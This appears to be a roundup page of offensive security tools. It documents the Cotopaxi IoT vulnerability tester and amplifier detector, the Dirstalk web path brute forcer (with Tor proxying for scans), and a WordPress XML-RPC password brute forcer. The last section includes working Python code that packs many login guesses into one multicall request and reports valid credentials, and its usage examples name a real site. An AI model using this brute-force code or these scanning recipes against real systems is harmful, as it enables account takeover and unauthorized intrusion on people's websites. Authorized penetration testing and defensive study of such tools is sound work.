usage: sudo client_vuln_tester.py [-h] [--server-ip SERVER_IP]
[--server-port SERVER_PORT]
[--protocol {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}]
[--verbose]
[--vuln {ALL,BOTAN_000,COAPTHON3_000,...} [{ALL,BOTAN_000,COAPTHON3_000,...} ...]]
[--cve {ALL,CVE-2017-12087,...} [{ALL,CVE-2017-12087,...} ...]]
[--list]

optional arguments:
-h, --help show this help message and exit
--server-ip SERVER_IP, -SI SERVER_IP
IP address, that will be used to set up tester server
--server-port SERVER_PORT, -SP SERVER_PORT
port that will be used to set up server
--protocol {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}, -P {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}
protocol to be tested
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--vuln {ALL,BOTAN_000,COAPTHON3_000,...} [{ALL,BOTAN_000,COAPTHON3_000,...} ...]
list of vulnerabilities to be tested (by SOFT_NUM id)
--cve {ALL,CVE-2017-12087,CVE-2017-12130,...} [{ALL,CVE-2017-12087,CVE-2017-12130,...} ...]
list of vulnerabilities to be tested (by CVE id)
--list, -L display lists of all vulnerabilities supported by this
tool with detailed description
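For example, a hypothetical test server waiting for CoAP clients (IP and port are placeholders; module-style invocation is assumed here, as with the other tools):
sudo python -m cotopaxi.client_vuln_tester -SI 192.168.0.2 -SP 5683 -P CoAP --vuln ALL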

cotopaxi.amplifier_detector
Tool for detecting network devices that amplify reflected traffic, by observing the sizes of incoming and outgoing packets
usage: sudo python -m cotopaxi.amplifier_detector [-h] [--port PORT] [--nr NR] [--verbose] dest_ip

positional arguments:
dest_ip destination IP address

optional arguments:
-h, --help show this help message and exit
--interval INTERVAL, -I INTERVAL
minimal interval in sec between displayed status
messages (default: 1 sec)
--port PORT, --dest_port PORT, -P PORT
destination port
--nr NR, -N NR number of packets to be sniffed (default: 9999999)
--verbose, -V, --debug, -D
turn on verbose/debug mode (more messages)
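For example, a hypothetical run sniffing traffic to a single device on the CoAP port, reporting every 5 seconds (IP and port are placeholders):
sudo python -m cotopaxi.amplifier_detector 192.168.0.20 --port 5683 --interval 5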

Known issues / limitations
There are some known issues or limitations caused by using scapy as network library:
  • testing services running on the same machine can result in issues caused by some packets not being delivered,
  • multiple tools running against the same target can result in interference between them (packets may be indicated as a response to another request).
See more at: https://scapy.readthedocs.io/en/latest/troubleshooting.html#

Unit tests
To run all unit tests, use (from the directory above the cotopaxi dir):
    sudo python -m unittest discover
Most of the tests are performed against remote test servers and require a prepared test environment, with settings provided in tests/test_config.ini and tests/test_servers.yaml.


Dirstalk - Modern Alternative To Dirbuster/Dirb


Dirstalk is a multi-threaded application designed to brute force paths on web servers.
The tool contains functionalities similar to the ones offered by dirbuster and dirb.

Here you can see it in action:


How to use it
The application is self-documenting: launching dirstalk -h will return all the available commands with a short description, and you can get the help for each command by doing dirstalk <command> -h.
e.g. dirstalk result.diff -h

Scan
To perform a scan you need to provide at least a dictionary and a URL:
dirstalk scan http://someaddress.url/ --dictionary mydictionary.txt
As mentioned before, to see all the flags available for the scan command you can just call the command with the -h flag:
dirstalk scan -h

Example of how you can customize a scan:
dirstalk scan http://someaddress.url/ \
--dictionary mydictionary.txt \
--http-methods GET,POST \
--http-timeout 10000 \
--scan-depth 10 \
--threads 10 \
--socks5 127.0.0.1:9150 \
--cookie name=value \
--use-cookie-jar \
--user-agent my_user_agent \
--header "Authorization: Bearer 123"

Currently available flags:
      --cookie stringArray             cookie to add to each request; eg name=value (can be specified multiple times)
-d, --dictionary string dictionary to use for the scan (path to local file or remote url)
--header stringArray header to add to each request; eg name=value (can be specified multiple times)
-h, --help help for scan
--http-cache-requests cache requests to avoid performing the same request multiple times within the same scan (EG if the server reply with the same redirect location multiple times, dirstalk will follow it only once) (default true)
--http-methods strings comma separated list of http methods to use; eg: GET,POST,PUT (default [GET])
--http-statuses-to-ignore ints   comma separated list of http statuses to ignore when showing and processing results; eg: 404,301 (default [404])
--http-timeout int timeout in milliseconds (default 5000)
--out string path where to store result output
--scan-depth int scan depth (default 3)
--socks5 string socks5 host to use
-t, --threads int amount of threads for concurrent requests (default 3)
--use-cookie-jar enables the use of a cookie jar: it will retain any cookie sent from the server and send them for the following requests
--user-agent string user agent to use for http requests

Useful resources
  • here you can find dictionaries that can be used with dirstalk
  • tordock is a containerized Tor SOCKS5 proxy that you can easily use with dirstalk (just docker run -d -p 127.0.0.1:9150:9150 stefanoj3/tordock:latest, then when launching a scan specify the following flag: --socks5 127.0.0.1:9150)

Dictionary generator
Dirstalk can also produce its own dictionaries, useful, for example, if you want to check whether a specific set of files is available on a given web server.

Example:
dirstalk dictionary.generate /path/to/local/files --out mydictionary.txt
The result will be printed to stdout if no --out flag is specified.
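The generated dictionary can then be fed straight back into a scan, e.g.:
dirstalk scan http://someaddress.url/ --dictionary mydictionary.txt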

Download
You can download a release from here or use a docker image (e.g. docker run stefanoj3/dirstalk dirstalk <cmd>).
If you are using an Arch-based Linux distribution you can fetch it via the AUR: https://aur.archlinux.org/packages/dirstalk/
Example:
yay -S aur/dirstalk

Development
All you need for local development is to have make and golang available, with the GOPATH correctly configured.
Then you can just:
go get github.com/stefanoj3/dirstalk         # (or your fork) to obtain the source code
cd $GOPATH/src/github.com/stefanoj3/dirstalk # to go inside the project folder
make dep # to fetch all the required tools and dependencies
make tests # to run the test suite
make check # to check for any code style issue
make fix # to automatically fix the code style using goimports
make build # to build an executable for your host OS (not tested under windows)
dep is the tool of choice for dependency management.
make help
will print a description of every command available in the Makefile.
Want to add a functionality or fix a bug? Fork and create a PR.

Plans for the future
  • Add support for rotating SOCKS5 proxies
  • Scan a website's pages looking for links to bruteforce
  • Expose a webserver that can be used to launch scans and check their status
  • Introduce metrics that can give a sense of how much of the dictionary was found on the remote server


XMLRPC Bruteforcer - An XMLRPC Brute Forcer Targeting Wordpress


An XMLRPC brute forcer targeting WordPress, written in Python 3. In the context of XML-RPC brute forcing, it's faster than Hydra and WPScan: it can brute force 1000 passwords per second.
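One common way to reach this kind of throughput against xmlrpc.php is to pack many login checks into a single system.multicall request, so hundreds of password guesses travel in one HTTP round trip. The following is a minimal Python 3 sketch of that idea (not the tool's actual code); the URL comes from the usage example below, while the username and password list are hypothetical:

# Illustrative sketch: batch WordPress login checks via XML-RPC system.multicall.
import xmlrpc.client

url = "http://wordpress.org/xmlrpc.php"          # target from the usage example below
username = "admin"                                # hypothetical username
passwords = ["123456", "letmein", "password1"]    # hypothetical candidate list

server = xmlrpc.client.ServerProxy(url)

# Pack many wp.getUsersBlogs login attempts into a single HTTP request.
calls = [
    {"methodName": "wp.getUsersBlogs", "params": [username, pwd]}
    for pwd in passwords
]
results = server.system.multicall(calls)

for pwd, result in zip(passwords, results):
    # Failed attempts come back as fault structs; successful ones return blog info.
    if not (isinstance(result, dict) and "faultCode" in result):
        print("[+] valid credentials: {}:{}".format(username, pwd))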

Usage
python3 xmlrpcbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt username
python3 xmlrpcbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt userlist.txt

Bugs
If you get an xml.etree.ElementTree.ParseError:
  • Did you forget to add 'xmlrpc' in the URL?
  • Try to add or remove 'https' or 'www'.
I'm working on the exception handling and will fix it soon.

Screenshot


